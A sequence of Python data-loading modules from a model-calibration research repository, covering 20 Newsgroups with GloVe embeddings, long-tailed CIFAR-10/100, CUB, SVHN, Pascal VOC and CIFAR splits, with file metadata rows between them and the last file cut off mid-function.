logger = logging.getLogger(__name__)
def ng_loader(
data_dir: str,
max_sequence_length: int = 1000,
max_num_words: int = 2000,
embedding_dim: int = 100,
test_split: float = 0.2,
shuffle=True,
random_seed=1,
):
# BASE_DIR = 'NewsGroup'
# GLOVE_DIR = os.path.join(BASE_DIR, 'glove.6B')
# TEXT_DATA_DIR = os.path.join(BASE_DIR, '20_newsgroup')
# MAX_SEQUENCE_LENGTH = 1000
# MAX_NUM_WORDS = 20000
# EMBEDDING_DIM = 100
# VALIDATION_SPLIT = 0.2
logger.info("Start process 20 newsgroups text data ...")
glove_dir = osp.join(data_dir, "glove.6B")
text_data_dir = osp.join(data_dir, "20_newsgroups")
logger.debug('Indexing word vectors.')
embeddings_index = {}
with open(
osp.join(glove_dir, "glove.6B.{}d.txt".format(embedding_dim))
) as f:
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
logger.debug('Found {} word vectors.'.format(len(embeddings_index)))
# second, prepare text samples and their labels
logger.debug('Processing text dataset')
texts = [] # list of text samples
labels_index = {} # dictionary mapping label name to numeric id
labels = [] # list of label ids
for name in sorted(os.listdir(text_data_dir)):
path = osp.join(text_data_dir, name)
if osp.isdir(path):
label_id = len(labels_index)
labels_index[name] = label_id
for fname in sorted(os.listdir(path)):
if fname.isdigit():
fpath = osp.join(path, fname)
if sys.version_info < (3,):
f = open(fpath)
else:
f = open(fpath, encoding='latin-1')
t = f.read()
i = t.find('\n\n') # skip header
if 0 < i:
t = t[i:]
texts.append(t)
f.close()
labels.append(label_id)
logger.debug('Found {} texts.'.format(len(texts)))
# finally, vectorize the text samples into a 2D integer tensor
tokenizer = Tokenizer(num_words=max_num_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
logger.debug('Found {} unique tokens.'.format(len(word_index)))
data = pad_sequences(sequences, maxlen=max_sequence_length)
labels = to_categorical(np.asarray(labels))
logger.info('Shape of data tensor: {}'.format(data.shape))
logger.info('Shape of label tensor: {}'.format(labels.shape))
# split the data into a training set and a validation set
indices = np.arange(data.shape[0])
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
num_test_samples = int(test_split * data.shape[0])
x_train = data[:-(num_test_samples + 900)] # Train set
y_train = labels[:-(num_test_samples + 900)]
x_val = data[
(data.shape[0] - num_test_samples - 900):(data.shape[0] - num_test_samples)
] # Validation set
y_val = labels[
data.shape[0]-(num_test_samples+900):(data.shape[0]-num_test_samples)
]
x_test = data[-num_test_samples:] # Test set
y_test = labels[-num_test_samples:]
logger.info(data.shape[0] - num_test_samples)
# logger.info('VAL: ', x_val.shape, data.shape)
# logger.info('Preparing embedding matrix.', x_train.shape)
# prepare embedding matrix
num_words = min(max_num_words, len(word_index))
embedding_matrix = torch.zeros(num_words, embedding_dim)
for word, i in word_index.items():
if i >= max_num_words:
continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
# words not found in embedding index will be all-zeros.
embedding_matrix[i] = torch.from_numpy(embedding_vector)
logger.info("Done with text processing")
return embedding_matrix, x_train, y_train, x_val, y_val, x_test, y_test, num_words, embedding_dim
| 4,485 | Python | .py | 108 | 33.62037 | 101 | 0.621355 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,872 | cifar10_LT.py | cvlab-yonsei_RankMixup/calibrate/data/cifar10_LT.py | import numpy as np
from .sampler import ClassAwareSampler
import torch
import torchvision
from torchvision import transforms
import torchvision.datasets
class IMBALANCECIFAR10(torchvision.datasets.CIFAR10):
cls_num = 10
def __init__(self, root, imb_type='exp', imb_factor=0.01, rand_number=0, train=True,
transform=None, target_transform=None,
download=False):
super(IMBALANCECIFAR10, self).__init__(root, train, transform, target_transform, download)
np.random.seed(rand_number)
img_num_list = self.get_img_num_per_cls(self.cls_num, imb_type, imb_factor)
self.gen_imbalanced_data(img_num_list)
def get_img_num_per_cls(self, cls_num, imb_type, imb_factor):
img_max = len(self.data) / cls_num
img_num_per_cls = []
if imb_type == 'exp':
for cls_idx in range(cls_num):
num = img_max * (imb_factor**(cls_idx / (cls_num - 1.0)))
img_num_per_cls.append(int(num))
elif imb_type == 'step':
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max))
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max * imb_factor))
else:
img_num_per_cls.extend([int(img_max)] * cls_num)
return img_num_per_cls
def gen_imbalanced_data(self, img_num_per_cls):
new_data = []
new_targets = []
targets_np = np.array(self.targets, dtype=np.int64)
classes = np.unique(targets_np)
# np.random.shuffle(classes)
self.num_per_cls_dict = dict()
for the_class, the_img_num in zip(classes, img_num_per_cls):
self.num_per_cls_dict[the_class] = the_img_num
idx = np.where(targets_np == the_class)[0]
np.random.shuffle(idx)
selec_idx = idx[:the_img_num]
new_data.append(self.data[selec_idx, ...])
new_targets.extend([the_class, ] * the_img_num)
new_data = np.vstack(new_data)
self.data = new_data
self.targets = new_targets
def get_cls_num_list(self):
cls_num_list = []
for i in range(self.cls_num):
cls_num_list.append(self.num_per_cls_dict[i])
return cls_num_list
class CIFAR10_LT(object):
def __init__(self, distributed, root='./data/cifar10', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
train_dataset = IMBALANCECIFAR10(root=root, imb_type=imb_type, imb_factor=imb_factor, rand_number=0, train=True, download=True, transform=train_transform)
eval_dataset = torchvision.datasets.CIFAR10(root=root, train=False, download=False, transform=eval_transform)
self.cls_num_list = train_dataset.get_cls_num_list()
self.dist_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed else None
self.train_instance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=True,
num_workers=num_works, pin_memory=True, sampler=self.dist_sampler)
balance_sampler = ClassAwareSampler(train_dataset)
self.train_balance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True, sampler=balance_sampler)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
class CIFAR10_LT_test(object):
def __init__(self, distributed, root='./data/cifar10', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_dataset = torchvision.datasets.CIFAR10(root=root, train=False, download=False, transform=eval_transform)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
def get_train_valid_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR10_LT(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
train_loader = dataset.train_balance
val_loader = dataset.eval
return (train_loader, val_loader)
def get_test_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR10_LT_test(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
test_loader = dataset.eval
return test_loader | 5,525 | Python | .py | 105 | 41.238095 | 162 | 0.631619 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,873 | cifar100_LT.py | cvlab-yonsei_RankMixup/calibrate/data/cifar100_LT.py | import numpy as np
from .sampler import ClassAwareSampler
import torch
import torchvision
from torchvision import transforms
import torchvision.datasets
class IMBALANCECIFAR100(torchvision.datasets.CIFAR100):
cls_num = 100
def __init__(self, root, imb_type='exp', imb_factor=0.01, rand_number=0, train=True,
transform=None, target_transform=None,
download=False):
super(IMBALANCECIFAR100, self).__init__(root, train, transform, target_transform, download)
np.random.seed(rand_number)
img_num_list = self.get_img_num_per_cls(self.cls_num, imb_type, imb_factor)
self.gen_imbalanced_data(img_num_list)
def get_img_num_per_cls(self, cls_num, imb_type, imb_factor):
img_max = len(self.data) / cls_num
img_num_per_cls = []
if imb_type == 'exp':
for cls_idx in range(cls_num):
num = img_max * (imb_factor**(cls_idx / (cls_num - 1.0)))
img_num_per_cls.append(int(num))
elif imb_type == 'step':
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max))
for cls_idx in range(cls_num // 2):
img_num_per_cls.append(int(img_max * imb_factor))
else:
img_num_per_cls.extend([int(img_max)] * cls_num)
return img_num_per_cls
def gen_imbalanced_data(self, img_num_per_cls):
new_data = []
new_targets = []
targets_np = np.array(self.targets, dtype=np.int64)
classes = np.unique(targets_np)
# np.random.shuffle(classes)
self.num_per_cls_dict = dict()
for the_class, the_img_num in zip(classes, img_num_per_cls):
self.num_per_cls_dict[the_class] = the_img_num
idx = np.where(targets_np == the_class)[0]
np.random.shuffle(idx)
selec_idx = idx[:the_img_num]
new_data.append(self.data[selec_idx, ...])
new_targets.extend([the_class, ] * the_img_num)
new_data = np.vstack(new_data)
self.data = new_data
self.targets = new_targets
def get_cls_num_list(self):
cls_num_list = []
for i in range(self.cls_num):
cls_num_list.append(self.num_per_cls_dict[i])
return cls_num_list
class CIFAR100_LT(object):
def __init__(self, distributed, root='./data/cifar100', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
train_dataset = IMBALANCECIFAR100(root=root, imb_type=imb_type, imb_factor=imb_factor, rand_number=0, train=True, download=True, transform=train_transform)
eval_dataset = torchvision.datasets.CIFAR100(root=root, train=False, download=False, transform=eval_transform)
self.cls_num_list = train_dataset.get_cls_num_list()
self.dist_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed else None
self.train_instance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=True,
num_workers=num_works, pin_memory=True, sampler=self.dist_sampler)
balance_sampler = ClassAwareSampler(train_dataset)
self.train_balance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True, sampler=balance_sampler)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
class CIFAR100_LT_test(object):
def __init__(self, distributed, root='./data/cifar100', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_dataset = torchvision.datasets.CIFAR100(root=root, train=False, download=False, transform=eval_transform)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
def get_train_valid_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR100_LT(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
train_loader = dataset.train_balance
val_loader = dataset.eval
return (train_loader, val_loader)
def get_test_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR100_LT_test(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
test_loader = dataset.eval
return test_loader | 5,543 | Python | .py | 105 | 41.361905 | 163 | 0.632529 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,874 | cub.py | cvlab-yonsei_RankMixup/calibrate/data/cub.py | import os.path as osp
from albumentations.augmentations.geometric.resize import SmallestMaxSize
import cv2
from torch.utils.data.dataset import Dataset
from torch.utils.data import DataLoader
from typing import Callable, Optional
import albumentations as A
from albumentations.pytorch import ToTensorV2
class CUBDataset(Dataset):
def __init__(self, data_root,
is_train: bool = True,
transformer: Optional[Callable] = None) -> None:
super().__init__()
self.data_root = data_root
self.img_dir = osp.join(self.data_root, "images")
self.is_train = is_train
self.transformer = transformer
self.load_list()
def load_list(self):
img_txt_file = osp.join(self.data_root, "images.txt")
with open(img_txt_file, "r") as f:
all_img_names = [
line.strip().split(" ")[-1]
for line in f
]
label_txt_file = osp.join(self.data_root, "image_class_labels.txt")
with open(label_txt_file, "r") as f:
all_labels = [
int(line.strip().split(" ")[-1]) - 1
for line in f
]
train_test_file = osp.join(self.data_root, "train_test_split.txt")
with open(train_test_file, "r") as f:
train_test = [
int(line.strip().split(" ")[-1])
for line in f
]
if self.is_train:
self.img_names = [
x for i, x in zip(train_test, all_img_names) if i
]
self.labels = [
x for i, x in zip(train_test, all_labels) if i
]
else:
self.img_names = [
x for i, x in zip(train_test, all_img_names) if not i
]
self.labels = [
x for i, x in zip(train_test, all_labels) if not i
]
def __getitem__(self, i: int):
label = self.labels[i]
img_path = osp.join(self.img_dir, self.img_names[i])
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self.transformer is not None:
result = self.transformer(image=img)
img = result["image"]
return img, label
def __len__(self) -> int:
return len(self.img_names)
def __repr__(self) -> str:
return (
"CUBDataset(data_root={}, is_train={}\tSamples : {})".format(
self.data_root, self.is_train, self.__len__()
)
)
def data_transformer(is_train: bool = True, scale_size=256, crop_size=224):
if is_train:
transformer = A.Compose([
A.Resize(scale_size, scale_size),
A.RandomCrop(crop_size, crop_size),
A.HorizontalFlip(),
A.Normalize(),
ToTensorV2()
])
else:
transformer = A.Compose([
A.Resize(scale_size, scale_size),
A.CenterCrop(crop_size, crop_size),
A.Normalize(),
ToTensorV2()
])
return transformer
def get_train_val_loader(
data_root, batch_size=32, scale_size=256, crop_size=224,
num_workers=8, pin_memory=True
):
train_dataset = CUBDataset(
data_root=data_root,
is_train=True,
transformer=data_transformer(
is_train=True, scale_size=scale_size, crop_size=crop_size
)
)
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True
)
val_dataset = CUBDataset(
data_root=data_root,
is_train=False,
transformer=data_transformer(
is_train=False, scale_size=scale_size, crop_size=crop_size
)
)
val_loader = DataLoader(
val_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory
)
return train_loader, val_loader
def get_test_loader(
data_root, batch_size=32, scale_size=256, crop_size=224,
num_workers=8, pin_memory=True
):
test_dataset = CUBDataset(
data_root=data_root,
is_train=False,
transformer=data_transformer(
is_train=False, scale_size=scale_size, crop_size=crop_size
)
)
test_loader = DataLoader(
test_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory
)
return test_loader
| 4,531 | Python | .py | 136 | 24.073529 | 75 | 0.565188 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,875 | svhn.py | cvlab-yonsei_RankMixup/calibrate/data/svhn.py |
import os
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
def get_train_valid_loader(batch_size,
augment,
random_seed,
valid_size=0.1,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning train and valid
multi-process iterators over the SVHN dataset.
Params:
------
- batch_size: how many samples per batch to load.
- augment: whether to apply the data augmentation scheme
mentioned in the paper. Only applied on the train split.
- random_seed: fix seed for reproducibility.
- valid_size: percentage split of the training set used for
the validation set. Should be a float in the range [0, 1].
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- train_loader: training set iterator.
- valid_loader: validation set iterator.
"""
error_msg = "[!] valid_size should be in the range [0, 1]."
assert ((valid_size >= 0) and (valid_size <= 1)), error_msg
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
#if augment:
# train_transform = transforms.Compose([
# transforms.RandomCrop(32, padding=4),
# transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# normalize,
# ])
#else:
# train_transform = transforms.Compose([
# transforms.ToTensor(),
# normalize,
# ])
# load the dataset
# data_dir = './data'
train_dataset = datasets.SVHN(
root=data_dir, split='train',
download=True, transform=valid_transform,
)
valid_dataset = datasets.SVHN(
root=data_dir, split='train',
download=True, transform=valid_transform,
)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, sampler=train_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
valid_loader = torch.utils.data.DataLoader(
valid_dataset, batch_size=batch_size, sampler=valid_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
return (train_loader, valid_loader)
def get_test_loader(batch_size,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning a multi-process
test iterator over the SVHN dataset.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- batch_size: how many samples per batch to load.
- shuffle: whether to shuffle the dataset after every epoch.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- data_loader: test set iterator.
"""
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transform
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# data_dir = './data'
dataset = datasets.SVHN(
root=data_dir, split='test',
download=True, transform=transform,
)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers, pin_memory=pin_memory,
)
return data_loader
| 4,560 | Python | .py | 125 | 29.04 | 76 | 0.62885 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,876 | voc.py | cvlab-yonsei_RankMixup/calibrate/data/voc.py | import os.path as osp
import numpy as np
import cv2
from PIL import Image
from typing import Callable, Optional
from torch.utils.data import Dataset, DataLoader
import albumentations as A
from albumentations.pytorch import ToTensorV2
CLASSES = ('background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog',
'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa',
'train', 'tvmonitor')
PALETTE = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],
[128, 0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0],
[192, 0, 0], [64, 128, 0], [192, 128, 0], [64, 0, 128],
[192, 0, 128], [64, 128, 128], [192, 128, 128], [0, 64, 0],
[128, 64, 0], [0, 192, 0], [128, 192, 0], [0, 64, 128]]
class VOCSegmentation(Dataset):
def __init__(
self,
data_root: str,
split: str = "train",
data_transform: Optional[Callable] = None,
return_id=False
):
assert split in {"train", "val", "trainval", "test"}
super().__init__()
self.data_root = data_root
self.split = split
self.data_transform = data_transform
self.return_id = return_id
self.classes = CLASSES
self.num_classes = 21
self.load_list()
def load_list(self):
self.img_dir = osp.join(self.data_root, "JPEGImages")
self.mask_dir = osp.join(self.data_root, "SegmentationClass")
self.split_dir = osp.join(self.data_root, "ImageSets/Segmentation")
split_file = osp.join(self.split_dir, "{}.txt".format(self.split))
with open(split_file, "r") as f:
file_names = [x.strip() for x in f.readlines()]
self.images = [osp.join(self.img_dir, x + ".jpg") for x in file_names]
self.masks = [osp.join(self.mask_dir, x + ".png") for x in file_names]
assert len(self.images) == len(self.masks)
def convert_to_segmentation_mask(self, mask, onehot=False):
# This function converts a mask from the Pascal VOC format to the format required by AutoAlbument.
#
# Pascal VOC uses an RGB image to encode the segmentation mask for that image. RGB values of a pixel
# encode the pixel's class.
#
# Each channel in this mask should encode values for a single class. Pixel in a mask channel should have
# a value of 1.0 if the pixel of the image belongs to this class and 0.0 otherwise.
height, width = mask.shape[:2]
segmentation_mask = np.zeros(
(height, width, self.num_classes), dtype=long
)
for label_index, label in enumerate(PALETTE):
segmentation_mask[:, :, label_index] = np.all(mask == label, axis=-1).astype(long)
return segmentation_mask
def __getitem__(self, index):
img = cv2.imread(self.images[index])
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
mask = np.array(Image.open(self.masks[index]))
if self.data_transform is not None:
result = self.data_transform(
image=img, mask=mask
)
img = result["image"]
mask = result["mask"].long()
if self.return_id:
return (
img, mask, self.images[index].split("/")[-1].split(".")[0]
)
else:
return img, mask
def __len__(self) -> int:
return len(self.images)
def __repr__(self) -> str:
return (
"VOCSegmentation (data_root={},split={})\tSamples : {}".format(
self.data_root, self.split, self.__len__()
)
)
def data_transformer(is_train: bool = True):
if is_train:
transformer = A.Compose([
A.LongestMaxSize(max_size=640),
A.PadIfNeeded(
min_height=512, min_width=512,
border_mode=cv2.BORDER_CONSTANT,
value=(0, 0, 0), mask_value=255
),
A.RandomCrop(height=512, width=512),
A.HorizontalFlip(),
A.RandomBrightnessContrast(brightness_limit=0.3, contrast_limit=0.3, p=0.5),
A.HueSaturationValue(),
A.Normalize(),
ToTensorV2()
])
else:
transformer = A.Compose([
A.LongestMaxSize(max_size=480),
A.PadIfNeeded(
min_height=480, min_width=480,
border_mode=cv2.BORDER_CONSTANT,
value=(0, 0, 0), mask_value=255
),
A.Normalize(),
ToTensorV2()
])
return transformer
def get_train_val_loader(
data_root, batch_size=32, num_workers=8, pin_memory=True
):
train_dataset = VOCSegmentation(
data_root,
split="train",
data_transform=data_transformer(is_train=True)
)
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True
)
val_dataset = VOCSegmentation(
data_root,
split="val",
data_transform=data_transformer(is_train=False)
)
val_loader = DataLoader(
val_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
return train_loader, val_loader
def get_test_loader(
data_root, batch_size=32,
num_workers=8, pin_memory=True
):
test_dataset = VOCSegmentation(
data_root,
split="val",
data_transform=data_transformer(is_train=False)
)
test_loader = DataLoader(
test_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
return test_loader
| 5,829 | Python | .py | 155 | 28.658065 | 112 | 0.576821 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,877 | cifar100.py | cvlab-yonsei_RankMixup/calibrate/data/cifar100.py | """
Create train, valid, test iterators for CIFAR-100.
Train set size: 45000
Val set size: 5000
Test set size: 10000
"""
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data.sampler import SubsetRandomSampler
def get_train_valid_loader(batch_size,
augment,
random_seed,
valid_size=0.1,
shuffle=True,
num_workers=4,
pin_memory=False,
get_val_temp=0,
data_dir="./data"):
"""
Utility function for loading and returning train and valid
multi-process iterators over the CIFAR-100 dataset.
Params:
------
- batch_size: how many samples per batch to load.
- augment: whether to apply the data augmentation scheme
mentioned in the paper. Only applied on the train split.
- random_seed: fix seed for reproducibility.
- valid_size: percentage split of the training set used for
the validation set. Should be a float in the range [0, 1].
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
- get_val_temp: set to 1 if temperature is to be set on a separate
val set other than normal val set.
Returns
-------
- train_loader: training set iterator.
- valid_loader: validation set iterator.
"""
error_msg = "[!] valid_size should be in the range [0, 1]."
assert ((valid_size >= 0) and (valid_size <= 1)), error_msg
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
if augment:
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
else:
train_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# load the dataset
# data_dir = './data'
train_dataset = datasets.CIFAR100(
root=data_dir, train=True,
download=True, transform=train_transform,
)
valid_dataset = datasets.CIFAR100(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
if get_val_temp > 0:
valid_temp_dataset = datasets.CIFAR100(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
split = int(np.floor(get_val_temp * split))
valid_idx, valid_temp_idx = valid_idx[split:], valid_idx[:split]
valid_temp_sampler = SubsetRandomSampler(valid_temp_idx)
valid_temp_loader = torch.utils.data.DataLoader(
valid_temp_dataset, batch_size=batch_size, sampler=valid_temp_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, sampler=train_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
valid_loader = torch.utils.data.DataLoader(
valid_dataset, batch_size=batch_size, sampler=valid_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
if get_val_temp > 0:
return (train_loader, valid_loader, valid_temp_loader)
else:
return (train_loader, valid_loader)
def get_test_loader(batch_size,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning a multi-process
test iterator over the CIFAR-100 dataset.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- data_dir: path directory to the dataset.
- batch_size: how many samples per batch to load.
- shuffle: whether to shuffle the dataset after every epoch.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- data_loader: test set iterator.
"""
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225],
)
# define transform
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# data_dir = './data'
dataset = datasets.CIFAR100(
root=data_dir, train=False,
download=True, transform=transform,
)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers, pin_memory=pin_memory,
)
return data_loader
| 5,533 | Python | .py | 148 | 29.216216 | 82 | 0.628705 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,878 | cifar10.py | cvlab-yonsei_RankMixup/calibrate/data/cifar10.py | """
Create train, valid, test iterators for CIFAR-10.
Train set size: 45000
Val set size: 5000
Test set size: 10000
"""
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data.sampler import SubsetRandomSampler
from calibrate.utils.torch_helper import worker_init_fn
def get_train_valid_loader(batch_size,
augment,
random_seed,
valid_size=0.1,
shuffle=True,
num_workers=4,
pin_memory=False,
get_val_temp=0,
data_dir="./data"):
"""
Utility function for loading and returning train and valid
multi-process iterators over the CIFAR-10 dataset.
Params:
------
- batch_size: how many samples per batch to load.
- augment: whether to apply the data augmentation scheme
mentioned in the paper. Only applied on the train split.
- random_seed: fix seed for reproducibility.
- valid_size: percentage split of the training set used for
the validation set. Should be a float in the range [0, 1].
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
- get_val_temp: set to 1 if temperature is to be set on a separate
val set other than normal val set.
Returns
-------
- train_loader: training set iterator.
- valid_loader: validation set iterator.
"""
error_msg = "[!] valid_size should be in the range [0, 1]."
assert ((valid_size >= 0) and (valid_size <= 1)), error_msg
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
if augment:
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
else:
train_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# load the dataset
# data_dir = './data'
train_dataset = datasets.CIFAR10(
root=data_dir, train=True,
download=True, transform=train_transform,
)
valid_dataset = datasets.CIFAR10(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
